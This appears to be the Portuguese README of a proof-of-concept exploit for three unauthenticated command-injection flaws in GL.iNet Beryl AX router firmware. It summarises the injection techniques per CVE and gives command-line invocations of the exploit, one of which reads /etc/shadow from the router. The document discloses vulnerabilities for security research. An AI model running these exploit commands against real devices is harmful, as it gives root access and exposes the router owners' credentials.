
PoC para três vulnerabilidades de injeção de comandos não autenticadas (CVE-2026-11450/1/2) no firmware do roteador de viagem GL.iNet Beryl AX versão <=4.4.5, explorando o dispatcher CGI sem autenticação.
PoC para três vulnerabilidades de injeção de comando não autenticadas (CVE-2026-11450, CVE-2026-11451, CVE-2026-11452) no firmware do roteador de viagem GL.iNet GL-MT3000 (Beryl AX) <= 4.4.5.
Artigo completo: https://www.hunt-benito.com/blog/glinet-beryl-ax-triple-rce-cve-2026-11450-11451-11452-unauthenticated-root-on-travel-router/
| CVE | CVSS | Técnica |
|---|---|---|
| CVE-2026-11450 | 7.3 | Incompatibilidade de tamanho de buffer (0x40 vs 0x100) contorna a verificação access(), $() injetado via system() |
| CVE-2026-11451 | 7.3 | Escape de aspas simples no parâmetro FTP media_dir quebra a citação do shell |
| CVE-2026-11452 | 7.3 | Substituição de comando $() no parâmetro de senha do Samba dentro de printf com aspas duplas |
Todas as três exploram o despachante CGI não autenticado /cgi-bin/glc que carrega plugins via dlopen/dlsym sem autenticação ou lista de permissão de métodos.
# Exploit all three CVEs
python3 poc.py http://192.168.8.1
# Exploit a specific CVE
python3 poc.py http://192.168.8.1 -c "id" -v 11450
python3 poc.py https://192.168.8.1 -c "id" -v 11451
python3 poc.py https://192.168.8.1 -c "id" -v 11452
# Custom command and output file
python3 poc.py http://192.168.8.1 -c "cat /etc/shadow" -o /tmp/pwned
Apenas para fins educacionais e de pesquisa de segurança autorizada. Não use contra sistemas que você não possui ou para os quais não tem permissão explícita para testar.